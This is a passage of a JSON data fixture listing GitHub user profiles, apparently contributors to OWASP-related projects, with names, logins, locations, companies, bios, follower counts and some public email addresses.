"2024-09-11T19:14:34.160Z", + "nest_updated_at": "2024-09-22T20:25:27.235Z", + "name": "Aaron G", + "login": "scriptingxss", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18707651?v=4", + "company": "", + "location": "Los Angeles", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 131, + "public_gists_count": 0, + "public_repositories_count": 56, + "created_at": "2016-04-27T20:10:12Z", + "updated_at": "2024-08-20T00:02:37Z", + "node_id": "MDQ6VXNlcjE4NzA3NjUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 13, + "fields": { + "nest_created_at": "2024-09-11T19:14:37.597Z", + "nest_updated_at": "2024-09-22T18:40:08.055Z", + "name": "Luca Pascal Rotsch", + "login": "rockhoppersec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112620456?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-09-01T09:19:53Z", + "updated_at": "2024-06-29T13:06:37Z", + "node_id": "U_kgDOBrZzqA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 14, + "fields": { + "nest_created_at": "2024-09-11T19:15:28.507Z", + "nest_updated_at": "2024-09-22T15:34:34.946Z", + "name": "Mohammed Janibasha", + "login": "janibashamd", + "email": "jani.basha.5000@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6093830?v=4", + "company": "None", + "location": "hyderabad", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2013-12-03T09:15:14Z", + "updated_at": "2024-09-13T12:05:06Z", + "node_id": "MDQ6VXNlcjYwOTM4MzA=", + "bio": "Cloud Security | OWASP | Python | Devops | WAF | Bot Defense | k8s", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 15, + "fields": { + "nest_created_at": "2024-09-11T19:16:13.683Z", + "nest_updated_at": "2024-09-11T19:16:13.683Z", + "name": "Vishwas Manral", + "login": "vishwasmanral", + "email": "vishwas.manral@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6797778?v=4", + "company": "", + "location": "San Jose, CA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-02-26T20:13:14Z", + "updated_at": "2024-01-09T20:08:58Z", + "node_id": "MDQ6VXNlcjY3OTc3Nzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 16, + "fields": { + "nest_created_at": "2024-09-11T19:16:14.096Z", + "nest_updated_at": "2024-09-22T15:35:22.709Z", + "name": "Andy", + "login": "rot169", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59445582?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2020-01-02T14:55:54Z", + "updated_at": "2024-08-10T17:12:49Z", + "node_id": "MDQ6VXNlcjU5NDQ1NTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "rot169" + } +}, +{ + "model": "github.user", + "pk": 17, + "fields": { + "nest_created_at": "2024-09-11T19:16:15.828Z", + "nest_updated_at": "2024-09-22T17:26:16.215Z", + "name": "Ads Dawson", + "login": "GangGreenTemperTatum", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104169244?v=4", + "company": "@cohere-ai ", + "location": "Earth", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 6, + "public_gists_count": 6, + "public_repositories_count": 46, + "created_at": "2022-04-21T20:21:33Z", + "updated_at": "2024-09-07T13:24:50Z", + "node_id": "U_kgDOBjV_HA", + "bio": "AppSec, LLM AppSec, MLSecOps, slurpin' noods 🍜 \r\n..\r\nOWASP Top 10 for LLM Applications and Generative AI Tech Lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 18, + "fields": { + "nest_created_at": "2024-09-11T19:16:16.230Z", + "nest_updated_at": "2024-09-22T17:39:32.266Z", + "name": "John Sotiropoulos", + "login": "jsotiro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2410281?v=4", + "company": "", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 9, + "public_gists_count": 3, + "public_repositories_count": 37, + "created_at": "2012-09-24T09:05:36Z", + "updated_at": "2024-07-31T22:18:51Z", + "node_id": "MDQ6VXNlcjI0MTAyODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 19, + "fields": { + "nest_created_at": "2024-09-11T19:16:19.590Z", + "nest_updated_at": "2024-09-22T15:35:24.619Z", + "name": "Bob Simonoff", + "login": "Bobsimonoff", + "email": "bob.simonoff@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/139978786?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-07-19T12:31:06Z", + "updated_at": "2024-01-03T12:54:38Z", + "node_id": "U_kgDOCFfoIg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 20, + "fields": { + "nest_created_at": "2024-09-11T19:16:25.606Z", + "nest_updated_at": "2024-09-22T15:35:23.349Z", + "name": "Jason Ross", + "login": "rossja", + "email": "algorythm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/230677?v=4", + "company": "", + "location": "Rochester, NY", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 173, + "public_gists_count": 19, + "public_repositories_count": 213, + "created_at": "2010-03-26T03:05:01Z", + "updated_at": "2024-08-27T02:01:09Z", + "node_id": "MDQ6VXNlcjIzMDY3Nw==", + "bio": "see: https://jasonross.info", + "is_hireable": false, + "twitter_username": "rossja" + } +}, +{ + "model": "github.user", + "pk": 21, + "fields": { + "nest_created_at": "2024-09-11T19:16:27.309Z", + "nest_updated_at": "2024-09-11T19:16:27.309Z", + "name": "Nicholas Grove", + "login": "nicholasgrove", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61357626?v=4", + "company": "@OWASP, @PSF, @EFForg, @Microsoft", + "location": "USA, Europe, East Asia", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-02-22T16:31:35Z", + "updated_at": "2023-12-13T01:29:34Z", + "node_id": "MDQ6VXNlcjYxMzU3NjI2", + "bio": "Security \\ Cloud \\ AI Engineer @microsoft • I ❤️ you, open source community.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 22, + "fields": { + "nest_created_at": "2024-09-11T19:16:29.416Z", + "nest_updated_at": "2024-09-22T15:35:22.081Z", + "name": "Steve Wilson", + "login": "virtualsteve-star", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62770473?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-03-27T19:35:56Z", + "updated_at": "2024-07-26T04:20:28Z", + "node_id": "MDQ6VXNlcjYyNzcwNDcz", + "bio": "Chief Product Officer at Contrast Security. Author of \"AI and Cybersecurity\", \"The Father/Daughter Guide to Crypto Mining\" and \"Java Platform Performance\"", + "is_hireable": false, + "twitter_username": "virtualsteve" + } +}, +{ + "model": "github.user", + "pk": 23, + "fields": { + "nest_created_at": "2024-09-11T19:16:46.359Z", + "nest_updated_at": "2024-09-11T19:16:46.359Z", + "name": "", + "login": "kyuz0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6874658?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-03-06T16:09:55Z", + "updated_at": "2024-08-24T15:33:36Z", + "node_id": "MDQ6VXNlcjY4NzQ2NTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 24, + "fields": { + "nest_created_at": "2024-09-11T19:16:46.757Z", + "nest_updated_at": "2024-09-22T15:35:25.555Z", + "name": "Leon Derczynski", + "login": "leondz", + "email": "leonderczynski@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/121934?v=4", + "company": "NVIDIA · ITU Copenhagen", + "location": "Copenhagen · Seattle", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 251, + "public_gists_count": 8, + "public_repositories_count": 82, + "created_at": "2009-09-01T14:47:38Z", + "updated_at": "2024-09-12T14:47:53Z", + "node_id": "MDQ6VXNlcjEyMTkzNA==", + "bio": "prof / scientist in cs / nlp / ml", + "is_hireable": false, + "twitter_username": "leonderczynski" + } +}, +{ + "model": "github.user", + "pk": 25, + "fields": { + "nest_created_at": "2024-09-11T19:16:48.089Z", + "nest_updated_at": "2024-09-11T19:16:48.089Z", + "name": "Ivan Kusturic", + "login": "IvanKusturic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85494415?v=4", + "company": "Vio.com", + "location": "Banja Luka, Bosnia and Herzegovina", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-06-07T11:53:17Z", + "updated_at": "2024-09-03T13:52:52Z", + "node_id": "MDQ6VXNlcjg1NDk0NDE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 26, + "fields": { + "nest_created_at": "2024-09-11T19:16:50.589Z", + "nest_updated_at": "2024-09-22T15:35:25.240Z", + "name": "Talesh Seeparsan", + "login": "talesh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/759591?v=4", + "company": "Bit79", + "location": "Vancouver", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 56, + "public_gists_count": 4, + "public_repositories_count": 10, + "created_at": "2011-04-29T19:24:35Z", + "updated_at": "2024-09-19T23:11:30Z", + "node_id": "MDQ6VXNlcjc1OTU5MQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "_Talesh" + } +}, +{ + "model": "github.user", + "pk": 27, + "fields": { + "nest_created_at": "2024-09-11T19:16:57.732Z", + "nest_updated_at": "2024-09-11T19:16:57.732Z", + "name": "yael-ps", + "login": "yael-ps", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/164334254?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-03-21T10:06:21Z", + "updated_at": "2024-07-14T11:14:38Z", + "node_id": "U_kgDOCcuKrg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 28, + "fields": { + "nest_created_at": "2024-09-11T19:16:58.131Z", + "nest_updated_at": "2024-09-11T19:16:58.131Z", + "name": "", + "login": "mkfnch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2190981?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2012-08-21T16:50:52Z", + "updated_at": "2024-04-29T19:26:30Z", + "node_id": "MDQ6VXNlcjIxOTA5ODE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 29, + "fields": { + "nest_created_at": "2024-09-11T19:17:01.225Z", + "nest_updated_at": "2024-09-22T19:49:02.784Z", + "name": "", + "login": "mhupfauer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2248537?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 7, + "public_repositories_count": 14, + "created_at": "2012-08-30T13:23:28Z", + "updated_at": "2024-09-09T20:41:49Z", + "node_id": "MDQ6VXNlcjIyNDg1Mzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 30, + "fields": { + "nest_created_at": "2024-09-11T19:17:01.636Z", + "nest_updated_at": "2024-09-22T15:35:23.024Z", + "name": "DistributedApps.AI", + "login": "kenhuangus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1869785?v=4", + "company": "DistributedApps.AI", + "location": "", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 13, + "public_gists_count": 3, + "public_repositories_count": 209, + "created_at": "2012-06-19T22:20:18Z", + "updated_at": "2024-09-14T20:01:59Z", + "node_id": "MDQ6VXNlcjE4Njk3ODU=", + "bio": "ChatGPT and Web3\r\nDistributedApps.AI\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 31, + "fields": { + "nest_created_at": "2024-09-11T19:17:05.919Z", + "nest_updated_at": "2024-09-11T19:17:05.919Z", + "name": "Bill Wilder", + "login": "codingoutloud", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/522806?v=4", + "company": "Development Partners Software LLC", + "location": "Boston", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 30, + "public_gists_count": 62, + "public_repositories_count": 81, + "created_at": "2010-12-14T14:53:29Z", + "updated_at": "2024-09-10T21:42:36Z", + "node_id": "MDQ6VXNlcjUyMjgwNg==", + "bio": "Azure AI and Cybersecurity consultant. Boston Azure founder. Microsoft MVP. ", + "is_hireable": false, + "twitter_username": "codingoutloud" + } +}, +{ + "model": "github.user", + "pk": 32, + "fields": { + "nest_created_at": "2024-09-11T19:17:08.883Z", + "nest_updated_at": "2024-09-22T15:35:31.618Z", + "name": "Philippe Schrettenbrunner", + "login": "phischde", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5195734?v=4", + "company": "MaibornWolff GmbH", + "location": "Munich, Germany", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-08-09T07:44:59Z", + "updated_at": "2024-06-16T15:44:46Z", + "node_id": "MDQ6VXNlcjUxOTU3MzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 33, + "fields": { + "nest_created_at": "2024-09-11T19:17:10.525Z", + "nest_updated_at": "2024-09-22T15:35:21.096Z", + "name": "", + "login": "idj3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23086857?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-10-26T21:42:47Z", + "updated_at": "2024-09-09T16:48:25Z", + "node_id": "MDQ6VXNlcjIzMDg2ODU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 34, + "fields": { + "nest_created_at": "2024-09-11T19:17:38.469Z", + "nest_updated_at": "2024-09-22T15:36:02.160Z", + "name": "turab", + "login": "turabiaslan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32524544?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-10-04T18:56:35Z", + "updated_at": "2024-09-14T11:46:25Z", + "node_id": "MDQ6VXNlcjMyNTI0NTQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 35, + "fields": { + "nest_created_at": "2024-09-11T19:17:57.386Z", + "nest_updated_at": "2024-09-16T20:01:35.211Z", + "name": "", + "login": "github-actions[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/15368?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-07-30T09:30:16Z", + "updated_at": "2018-09-18T23:02:41Z", + "node_id": "MDM6Qm90NDE4OTgyODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 36, + "fields": { + "nest_created_at": "2024-09-11T19:18:52.568Z", + "nest_updated_at": "2024-09-22T16:37:39.885Z", + "name": "JITU RANJAN", + "login": "Jitu-Ranjan", + "email": "jitu.ranjan007@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27674141?v=4", + "company": "", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2017-04-17T08:55:27Z", + "updated_at": "2024-09-13T13:40:06Z", + "node_id": "MDQ6VXNlcjI3Njc0MTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 37, + "fields": { + "nest_created_at": "2024-09-11T19:18:58.754Z", + "nest_updated_at": "2024-09-22T15:37:14.566Z", + "name": "", + "login": "errXprintln", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75133807?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-11-27T15:55:53Z", + "updated_at": "2024-09-05T14:22:26Z", + "node_id": "MDQ6VXNlcjc1MTMzODA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 38, + "fields": { + "nest_created_at": "2024-09-11T19:19:15.526Z", + "nest_updated_at": "2024-09-22T15:37:32.800Z", + "name": "Peter Lai", + "login": "sc0Vu", + "email": "alk03073135@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10494397?v=4", + "company": "", + "location": "Taiwan", + "collaborators_count": 0, + "following_count": 117, + "followers_count": 251, + "public_gists_count": 29, + "public_repositories_count": 293, + "created_at": "2015-01-12T06:36:28Z", + "updated_at": "2024-09-16T18:38:25Z", + "node_id": "MDQ6VXNlcjEwNDk0Mzk3", + "bio": "Creator of web3.php. Research distributed system. Learn and discover new edge technology mev, layer 2, proof of stake, zkps.", + "is_hireable": false, + "twitter_username": "alk03073135" + } +}, +{ + "model": "github.user", + "pk": 39, + "fields": { + "nest_created_at": "2024-09-11T19:19:15.946Z", + "nest_updated_at": "2024-09-22T15:37:34.113Z", + "name": "Shashank", + "login": "Shashank-In", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16235299?v=4", + "company": "CredShields", + "location": "India", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 177, + "public_gists_count": 24, + "public_repositories_count": 22, + "created_at": "2015-12-10T05:06:11Z", + "updated_at": "2024-06-12T06:13:56Z", + "node_id": "MDQ6VXNlcjE2MjM1Mjk5", + "bio": "CEO @Credshields building SolidityScan.com | Part-time bug-bounty hunter. Listed in Google, Facebook, Apple hall of fame for reporting security issues", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 40, + "fields": { + "nest_created_at": "2024-09-11T19:19:49.004Z", + "nest_updated_at": "2024-09-22T20:23:49.753Z", + "name": "Jeroen Willemsen", + "login": "commjoen", + "email": "jeroenwillemsen2001@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1457214?v=4", + "company": "", + "location": "NL", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 115, + "public_gists_count": 1, + "public_repositories_count": 57, + "created_at": "2012-02-21T12:41:47Z", + "updated_at": "2024-09-13T11:41:14Z", + "node_id": "MDQ6VXNlcjE0NTcyMTQ=", + "bio": "PSA & Full Stack Developer\r\nProject lead OWASP WrongSecrets", + "is_hireable": false, + "twitter_username": "commjoenie" + } +}, +{ + "model": "github.user", + "pk": 41, + "fields": { + "nest_created_at": "2024-09-11T19:19:49.826Z", + "nest_updated_at": "2024-09-22T20:22:12.953Z", + "name": "Rob van der Veer", + "login": "robvanderveer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/796794?v=4", + "company": "Software Improvement Group, OWASP, NEN, ISO/IEC, CIP", + "location": "Amsterdam", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2011-05-18T21:16:18Z", + "updated_at": "2024-09-18T15:40:08Z", + "node_id": "MDQ6VXNlcjc5Njc5NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 42, + "fields": { + "nest_created_at": "2024-09-11T19:19:53.237Z", + "nest_updated_at": "2024-09-13T03:39:12.469Z", + "name": "karthik Ramamoorthy", + "login": "spbreed", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8321991?v=4", + "company": "Cloud Technology Partners", + "location": "United States", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 12, + "public_gists_count": 4, + "public_repositories_count": 109, + "created_at": "2014-07-31T16:15:23Z", + "updated_at": "2024-07-24T16:27:38Z", + "node_id": "MDQ6VXNlcjgzMjE5OTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 43, + "fields": { + "nest_created_at": "2024-09-11T19:20:33.427Z", + "nest_updated_at": "2024-09-22T20:28:05.718Z", + "name": "Jon Gadsden", + "login": "jgadsden", + "email": "jon.gadsden@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/29352392?v=4", + "company": "@pingidentity", + "location": "Bristol, UK", + "collaborators_count": 0, + "following_count": 436, + "followers_count": 226, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2017-06-11T10:30:41Z", + "updated_at": "2024-09-16T15:03:44Z", + "node_id": "MDQ6VXNlcjI5MzUyMzky", + "bio": "Software security engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 44, + "fields": { + "nest_created_at": "2024-09-11T19:20:48.054Z", + "nest_updated_at": "2024-09-22T18:41:41.449Z", + "name": "Raushan Raj", + "login": "sttor", + "email": "raushan.raj@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/54439583?v=4", + "company": "Sttor ", + "location": "Delhi", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 13, + "public_gists_count": 4, + "public_repositories_count": 93, + "created_at": "2019-08-23T11:11:37Z", + "updated_at": "2024-08-28T15:56:39Z", + "node_id": "MDQ6VXNlcjU0NDM5NTgz", + "bio": "Code for Cybersecurity.\r\n\r\n@raushan@infosec.exchange", + "is_hireable": false, + "twitter_username": "raushan_rajj" + } +}, +{ + "model": "github.user", + "pk": 45, + "fields": { + "nest_created_at": "2024-09-11T19:20:51.163Z", + "nest_updated_at": "2024-09-22T19:25:37.001Z", + "name": "Shaik Ajmal", + "login": "pwned-17", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61360833?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 3, + "public_gists_count": 7, + "public_repositories_count": 48, + "created_at": "2020-02-22T18:46:33Z", + "updated_at": "2024-08-13T05:43:14Z", + "node_id": "MDQ6VXNlcjYxMzYwODMz", + "bio": "GSoC'21 @ OWASP Foundation | InfoSec | Python Developer | CEH |", + "is_hireable": false, + "twitter_username": "mocking_aj" + } +}, +{ + "model": "github.user", + "pk": 46, + "fields": { + "nest_created_at": "2024-09-11T19:20:52.434Z", + "nest_updated_at": "2024-09-11T19:20:52.434Z", + "name": "Ryan Nguyen", + "login": "RangerJavelin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55316863?v=4", + "company": "Microsoft APAC", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 1176, + "followers_count": 41, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-09-14T11:13:28Z", + "updated_at": "2024-09-11T07:11:40Z", + "node_id": "MDQ6VXNlcjU1MzE2ODYz", + "bio": "Cybersecurity Specialist", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 47, + "fields": { + "nest_created_at": "2024-09-11T19:21:27.399Z", + "nest_updated_at": "2024-09-22T15:39:45.196Z", + "name": "Reelix", + "login": "Reelix", + "email": "reelix+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/289404?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 33, + "public_gists_count": 32, + "public_repositories_count": 37, + "created_at": "2010-05-28T05:51:10Z", + "updated_at": "2024-02-14T14:55:32Z", + "node_id": "MDQ6VXNlcjI4OTQwNA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 48, + "fields": { + "nest_created_at": "2024-09-11T19:22:04.950Z", + "nest_updated_at": "2024-09-22T18:43:23.844Z", + "name": "Ben de Haan", + "login": "bendehaan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53901866?v=4", + "company": "ENACT-IT", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 19, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2019-08-08T11:07:42Z", + "updated_at": "2024-09-12T09:41:20Z", + "node_id": "MDQ6VXNlcjUzOTAxODY2", + "bio": "Freelance security consultant & engineer", + "is_hireable": false, + "twitter_username": "BJFdeHaan" + } +}, +{ + "model": "github.user", + "pk": 49, + "fields": { + "nest_created_at": "2024-09-11T19:22:10.419Z", + "nest_updated_at": "2024-09-22T20:27:13.228Z", + "name": "Freedisch", + "login": "Freedisch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82499435?v=4", + "company": "", + "location": "Kigali, Rwanda", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 125, + "created_at": "2021-04-14T07:29:49Z", + "updated_at": "2024-09-22T12:37:05Z", + "node_id": "MDQ6VXNlcjgyNDk5NDM1", + "bio": "Open Source Wizard", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 50, + "fields": { + "nest_created_at": "2024-09-11T19:22:59.495Z", + "nest_updated_at": "2024-09-22T18:42:14.259Z", + "name": "Todor Olev", + "login": "todorolev", + "email": "todor.olev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25242734?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-01-20T08:35:21Z", + "updated_at": "2023-12-14T17:01:48Z", + "node_id": "MDQ6VXNlcjI1MjQyNzM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 51, + "fields": { + "nest_created_at": "2024-09-11T19:23:23.802Z", + "nest_updated_at": "2024-09-22T18:42:09.259Z", + "name": "Jin Kiat Low", + "login": "jklow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11328118?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-03-05T07:46:41Z", + "updated_at": "2024-08-23T11:34:33Z", + "node_id": "MDQ6VXNlcjExMzI4MTE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 52, + "fields": { + "nest_created_at": "2024-09-11T19:25:01.630Z", + "nest_updated_at": "2024-09-22T15:43:26.634Z", + "name": "Sk3pper", + "login": "Sk3pper", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13051136?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-06-25T14:47:07Z", + "updated_at": "2024-09-17T16:25:44Z", + "node_id": "MDQ6VXNlcjEzMDUxMTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 53, + "fields": { + "nest_created_at": "2024-09-11T19:25:30.961Z", + "nest_updated_at": "2024-09-22T20:26:12.185Z", + "name": "Ankit Choudhary", + "login": "ankit2001", + "email": "ankitchoudhary202.ac@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/44541855?v=4", + "company": "Amazon", + "location": "Kurukshetra,Haryana", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 88, + "public_gists_count": 1, + "public_repositories_count": 84, + "created_at": "2018-10-28T07:43:26Z", + "updated_at": "2024-08-19T04:47:43Z", + "node_id": "MDQ6VXNlcjQ0NTQxODU1", + "bio": "Software Development Engineer @AWS", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 54, + "fields": { + "nest_created_at": "2024-09-11T19:25:40.204Z", + "nest_updated_at": "2024-09-22T15:44:08.800Z", + "name": "shweta gurnani", + "login": "shwetagurnani", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43384092?v=4", + "company": "", + "location": "Bengaluru, Karnataka", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 84, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2018-09-18T16:38:38Z", + "updated_at": "2024-09-08T19:10:27Z", + "node_id": "MDQ6VXNlcjQzMzg0MDky", + "bio": "SDE II @ Amazon | Microsoft Engage' 21 | Ex- SDE Intern @ Walmart'22, Twitter' 21, Amazon' 21 | Google SPS'20 | CSE @ IIITU", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 55, + "fields": { + "nest_created_at": "2024-09-11T19:26:06.492Z", + "nest_updated_at": "2024-09-22T19:21:50.227Z", + "name": "", + "login": "nickmillerinfosec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81949902?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 